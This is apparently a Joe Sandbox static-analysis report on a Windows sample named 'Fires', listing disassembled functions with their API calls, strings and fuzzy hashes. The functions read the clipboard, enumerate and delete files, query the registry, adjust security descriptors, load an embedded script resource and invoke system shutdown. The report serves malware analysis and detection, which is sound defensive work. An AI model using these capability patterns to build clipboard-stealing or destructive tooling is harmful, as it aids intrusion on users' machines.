SetUserObjectSecurity.USER32(?,00000004,?), ref: 00DA166A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DA1691
HeapFree.KERNEL32(00000000), ref: 00DA1698
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DA16A1
HeapFree.KERNEL32(00000000), ref: 00DA16A8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DA16B1
HeapFree.KERNEL32(00000000), ref: 00DA16B8
GetProcessHeap.KERNEL32(00000000,?), ref: 00DA16C4
HeapFree.KERNEL32(00000000), ref: 00DA16CB

Part of subcall function 00DA1ADF: GetProcessHeap.KERNEL32(00000008,00DA14FD,?,00000000,?,00DA14FD,?), ref: 00DA1AED
Part of subcall function 00DA1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00DA14FD,?), ref: 00DA1AF4
Part of subcall function 00DA1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00DA14FD,?), ref: 00DA1B03

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 9f134da37dc25369987f5fe469898420b3553b79ba9735135fc8202f3b93bff4
Instruction ID: 082107b7c36986746d62975e12dd4e885bf0250b445a200d88512a78234cede4
Opcode Fuzzy Hash: 9f134da37dc25369987f5fe469898420b3553b79ba9735135fc8202f3b93bff4
Instruction Fuzzy Hash: 237159B6901219BBDF109FA5DC48FAEBBB9FF45340F0C8616E915E6290D7319A05CBB0

Function 00DBF55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00DDDCD0), ref: 00DBF586
IsClipboardFormatAvailable.USER32(0000000D), ref: 00DBF594
GetClipboardData.USER32(0000000D), ref: 00DBF5A0
CloseClipboard.USER32 ref: 00DBF5AC
GlobalLock.KERNEL32(00000000), ref: 00DBF5E4
CloseClipboard.USER32 ref: 00DBF5EE
GlobalUnlock.KERNEL32(00000000), ref: 00DBF619
IsClipboardFormatAvailable.USER32(00000001), ref: 00DBF626
GetClipboardData.USER32(00000001), ref: 00DBF62E
GlobalLock.KERNEL32(00000000), ref: 00DBF63F
GlobalUnlock.KERNEL32(00000000), ref: 00DBF67F
IsClipboardFormatAvailable.USER32(0000000F), ref: 00DBF695
GetClipboardData.USER32(0000000F), ref: 00DBF6A1
GlobalLock.KERNEL32(00000000), ref: 00DBF6B2
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00DBF6D4
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00DBF6F1
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00DBF72F
GlobalUnlock.KERNEL32(00000000), ref: 00DBF750
CountClipboardFormats.USER32 ref: 00DBF771
CloseClipboard.USER32 ref: 00DBF7B6

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: ad749fcc04aae3df02f41e966abe4c3ab7cd26b4df021941b63cc438c903808b
Instruction ID: 5c92ff77a7efe09ae251eade00c8be50ad79b779bb8d07603edc4d33d04792d7
Opcode Fuzzy Hash: ad749fcc04aae3df02f41e966abe4c3ab7cd26b4df021941b63cc438c903808b
Instruction Fuzzy Hash: F2619B35205301AFD710EF24DC84FAABBA5EF84714F18456AF846C72A2DB31E945CBB2

Function 00DB73D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00DB7403
FindClose.KERNEL32(00000000), ref: 00DB7457
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DB7493
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DB74BA

Part of subcall function 00D4B329: _wcslen.LIBCMT ref: 00D4B333

FileTimeToSystemTime.KERNEL32(?,?), ref: 00DB74F7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00DB7524

Strings

%03d, xrefs: 00DB77E7
%02d, xrefs: 00DB7645, 00DB764F, 00DB769F, 00DB76EF, 00DB773F, 00DB778F
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00DB7577
%4d%02d%02d%02d%02d%02d, xrefs: 00DB75AF
%4d, xrefs: 00DB75F6

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: af48bac49a56149eefbdd3da171e5045b0fb3ac41ff9c8fc03fc3aca3e858183
Instruction ID: 34d0d9ed2f61598d6dd20edae1f8fbc630c470292bf12f5ed316e46dd1a73ee5
Opcode Fuzzy Hash: af48bac49a56149eefbdd3da171e5045b0fb3ac41ff9c8fc03fc3aca3e858183
Instruction Fuzzy Hash: 73D13F72508344AFC710EB64C845EAFB7E8EF98704F44491AF586D6291EB74DA48CB72

Function 00DBA087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00DBA0A8
GetFileAttributesW.KERNEL32(?), ref: 00DBA0E6
SetFileAttributesW.KERNEL32(?,?), ref: 00DBA100
FindNextFileW.KERNEL32(00000000,?), ref: 00DBA118
FindClose.KERNEL32(00000000), ref: 00DBA123
FindFirstFileW.KERNEL32(*.*,?), ref: 00DBA13F
SetCurrentDirectoryW.KERNEL32(?), ref: 00DBA18F
SetCurrentDirectoryW.KERNEL32(00E07B94), ref: 00DBA1AD
FindNextFileW.KERNEL32(00000000,00000010), ref: 00DBA1B7
FindClose.KERNEL32(00000000), ref: 00DBA1C4
FindClose.KERNEL32(00000000), ref: 00DBA1D4

Strings

*.*, xrefs: 00DBA13A

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: efc8fb661e15de653a58eae8d828add79a9c6d48853346b00b34e56a0cec2a38
Instruction ID: c1129105ba19e2977998a4c96cb37fb80dbdae1091782adc189472327df6ede1
Opcode Fuzzy Hash: efc8fb661e15de653a58eae8d828add79a9c6d48853346b00b34e56a0cec2a38
Instruction Fuzzy Hash: B531E431641319AFDF10AFBDDC4AAEE77AD9F04360F140096E856E21D0EB70DE858A75

Function 00DB4763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00DB4785
_wcslen.LIBCMT ref: 00DB47B2
CreateDirectoryW.KERNEL32(?,00000000), ref: 00DB47E2
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00DB4803
RemoveDirectoryW.KERNEL32(?), ref: 00DB4813
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00DB489A
CloseHandle.KERNEL32(00000000), ref: 00DB48A5
CloseHandle.KERNEL32(00000000), ref: 00DB48B0

Strings

:, xrefs: 00DB47C7
\??\%s, xrefs: 00DB47A0
\, xrefs: 00DB47BC

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: 03eb5602222cd5ee64c795f5b907dae82dfee076850c8385948c6855750a22e5
Instruction ID: 12fbdae1523bd96a2d3f057bfae95de10c4957229549826d208cd2416dbf751b
Opcode Fuzzy Hash: 03eb5602222cd5ee64c795f5b907dae82dfee076850c8385948c6855750a22e5
Instruction Fuzzy Hash: A6318DB5900249ABDB21DBA0DC49FEB37BDEF89740F1041B6F60AD6161EB709684CB74

Function 00DBA1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00DBA203
FindNextFileW.KERNEL32(00000000,?), ref: 00DBA25E
FindClose.KERNEL32(00000000), ref: 00DBA269
FindFirstFileW.KERNEL32(*.*,?), ref: 00DBA285
SetCurrentDirectoryW.KERNEL32(?), ref: 00DBA2D5
SetCurrentDirectoryW.KERNEL32(00E07B94), ref: 00DBA2F3
FindNextFileW.KERNEL32(00000000,00000010), ref: 00DBA2FD
FindClose.KERNEL32(00000000), ref: 00DBA30A
FindClose.KERNEL32(00000000), ref: 00DBA31A

Part of subcall function 00DAE399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00DAE3B4

Strings

*.*, xrefs: 00DBA280

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 72f9b9085d7c0743f62e17b3a1a13a17a57aeb3e8327367d7ee64c13d7a95ad5
Instruction ID: 192860e5bf6ea0eab38eb8d2e100d1e51a5d5bbc299bd10d00c547710bc9b177
Opcode Fuzzy Hash: 72f9b9085d7c0743f62e17b3a1a13a17a57aeb3e8327367d7ee64c13d7a95ad5
Instruction Fuzzy Hash: 2631E131501319AFCF20AFA8EC49ADE77ADDF45324F144196E812E22D0DB31DE85CA79

Function 00DCC8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00DCD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DCC10E,?,?), ref: 00DCD415
Part of subcall function 00DCD3F8: _wcslen.LIBCMT ref: 00DCD451
Part of subcall function 00DCD3F8: _wcslen.LIBCMT ref: 00DCD4C8
Part of subcall function 00DCD3F8: _wcslen.LIBCMT ref: 00DCD4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DCC99E
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00DCCA09
RegCloseKey.ADVAPI32(00000000), ref: 00DCCA2D
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00DCCA8C
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00DCCB47
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00DCCBB4
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00DCCC49
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00DCCC9A
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00DCCD43
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00DCCDE2
RegCloseKey.ADVAPI32(00000000), ref: 00DCCDEF

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3102970594-0
Opcode ID: 62ec79767aec09d839837b9e13ffd83cd243ee04d3cd6c4130f10bd9af52bf37
Instruction ID: 4061ce4053273bf32b37e030a18da611375cd0f6676f8c0a74cc0feff0d0a255
Opcode Fuzzy Hash: 62ec79767aec09d839837b9e13ffd83cd243ee04d3cd6c4130f10bd9af52bf37
Instruction Fuzzy Hash: 31023E716142019FC714DF24C895F2ABBE5EF89314F1884ADF54ACB2A2DB31ED46CB61

Function 00DAD921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00D45851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D455D1,?,?,00D84B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00D45871

Part of subcall function 00DAEAB0: GetFileAttributesW.KERNEL32(?,00DAD840), ref: 00DAEAB1

FindFirstFileW.KERNEL32(?,?), ref: 00DAD9CD
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00DADA88
MoveFileW.KERNEL32(?,?), ref: 00DADA9B
DeleteFileW.KERNEL32(?,?,?,?), ref: 00DADAB8
FindNextFileW.KERNEL32(00000000,00000010), ref: 00DADAE2

Part of subcall function 00DADB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00DADAC7,?,?), ref: 00DADB5D

FindClose.KERNEL32(00000000,?,?,?), ref: 00DADAFE
FindClose.KERNEL32(00000000), ref: 00DADB0F

Strings

\*.*, xrefs: 00DAD978, 00DAD981, 00DAD996

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: ec630ea0247ed9fe26138978c857e26ad6ada89df477b7158a78e8db6e6de266
Instruction ID: b29f0e2947f1d241b4fd2203e3dda6fcd61fad22ee9875d985af2d2e7355150b
Opcode Fuzzy Hash: ec630ea0247ed9fe26138978c857e26ad6ada89df477b7158a78e8db6e6de266
Instruction Fuzzy Hash: 6561193180520DAFCF05EBA0D992AEDB7B6EF25310F2441A6E446B7195EB319F09CB71

Function 00DBF7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00DBF7EE
EmptyClipboard.USER32 ref: 00DBF7F4
GlobalAlloc.KERNEL32(00000002,?), ref: 00DBF809
CloseClipboard.USER32 ref: 00DBF900

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 944be1163de53966cc0371dfaf1112f6cd146cdc3f541de0806b023b405cd1a0
Instruction ID: b8066e401eeeda56f77e162e4480a3c9217fafb1775321695a65022e293a113e
Opcode Fuzzy Hash: 944be1163de53966cc0371dfaf1112f6cd146cdc3f541de0806b023b405cd1a0
Instruction Fuzzy Hash: 14418B74605601EFE710CF15D888B59BBA5FF44318F19C4A9E81A8B762CB35EC42CBE0

Function 00DAF20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00DA2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DA205A
Part of subcall function 00DA2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DA2087
Part of subcall function 00DA2010: GetLastError.KERNEL32 ref: 00DA2097

ExitWindowsEx.USER32(?,00000000), ref: 00DAF249

Strings

@, xrefs: 00DAF23C
SeShutdownPrivilege, xrefs: 00DAF219
, xrefs: 00DAF273
, xrefs: 00DAF237

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 41c0b1f56de25e8017cff877f46a43056534f7e4d0672a66b475da530c56c485
Instruction ID: a791261b9e60d4cff6c9ac299e80ec18555a25d2a88495c416b5edeb12ca54ab
Opcode Fuzzy Hash: 41c0b1f56de25e8017cff877f46a43056534f7e4d0672a66b475da530c56c485
Instruction Fuzzy Hash: F101D67A6113106BEB2463F89C8AFBE736C9B0A344F154971FD43E21D1D6649D0091B8

Function 00D422AD Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 308COMMON

Download Yara Rule

APIs

DefDlgProcW.USER32(?,?), ref: 00D4233E
GetSysColor.USER32(0000000F), ref: 00D42421
SetBkColor.GDI32(?,00000000), ref: 00D42434

Strings

(, xrefs: 00D4240A

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Color$Proc
String ID: (
API String ID: 929743424-2063206799
Opcode ID: a67dc8621a012624a836efd156626f57d6bba26cb03a8419d6ebe837acb2951d
Instruction ID: 350ff658b291fa6375efa5049cc194dbdf5e71caf57a6c67129aa59082023b13
Opcode Fuzzy Hash: a67dc8621a012624a836efd156626f57d6bba26cb03a8419d6ebe837acb2951d
Instruction Fuzzy Hash: 068135F0118440BFE6297E3C8C9CE7F296EDB82700F59011EF186D6A95C95ACF429376

Function 00DB3A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00D856C2,?,?,00000000,00000000), ref: 00DB3A1E
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00D856C2,?,?,00000000,00000000), ref: 00DB3A35
LoadResource.KERNEL32(?,00000000,?,?,00D856C2,?,?,00000000,00000000,?,?,?,?,?,?,00D466CE), ref: 00DB3A45
SizeofResource.KERNEL32(?,00000000,?,?,00D856C2,?,?,00000000,00000000,?,?,?,?,?,?,00D466CE), ref: 00DB3A56
LockResource.KERNEL32(00D856C2,?,?,00D856C2,?,?,00000000,00000000,?,?,?,?,?,?,00D466CE,?), ref: 00DB3A65

Strings

SCRIPT, xrefs: 00DB3A2B

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: b9d4854eaac97805edefedd30bfed8f03e190568b6c8efc4a8265ce6d311858a
Instruction ID: ebe261166f772fa674cf36d1f255d7619463268bc49f1ec2a8fcc60c19fb750b
Opcode Fuzzy Hash: b9d4854eaac97805edefedd30bfed8f03e190568b6c8efc4a8265ce6d311858a
Instruction Fuzzy Hash: EF113971201701BFEB218B65DC48F677BBEEBC5B51F24426DB442DA2A0DB71ED059A30

Function 00DA20AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00DA1900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00DA1916
Part of subcall function 00DA1900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00DA1922
Part of subcall function 00DA1900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00DA1931
Part of subcall function 00DA1900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00DA1938
Part of subcall function 00DA1900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00DA194E

GetLengthSid.ADVAPI32(?,00000000,00DA1C81), ref: 00DA20FB
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00DA2107
HeapAlloc.KERNEL32(00000000), ref: 00DA210E
CopySid.ADVAPI32(00000000,00000000,?), ref: 00DA2127
GetProcessHeap.KERNEL32(00000000,00000000,00DA1C81), ref: 00DA213B
HeapFree.KERNEL32(00000000), ref: 00DA2142

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 5c91eaa3542ccfedab3bd3ea4d8c8306908cfa330cf7c5a6bd50002562d85f72
Instruction ID: bff5d488b5e3ea310fdd9f46214853413beb2bff2064b5b82a90e31024633455
Opcode Fuzzy Hash: 5c91eaa3542ccfedab3bd3ea4d8c8306908cfa330cf7c5a6bd50002562d85f72
Instruction Fuzzy Hash: 7911AC71602705FFDB109B69CC09BBE7BAAEF56356F188019E981D7220C7359A40CB70

Function 00DBA570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00D4B329: _wcslen.LIBCMT ref: 00D4B333

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00DBA5BD
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00DBA6D0

Part of subcall function 00DB42B9: GetInputState.USER32 ref: 00DB4310
Part of subcall function 00DB42B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DB43AB

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00DBA5ED
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00DBA6BA

Strings

*.*, xrefs: 00DBA5A2

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
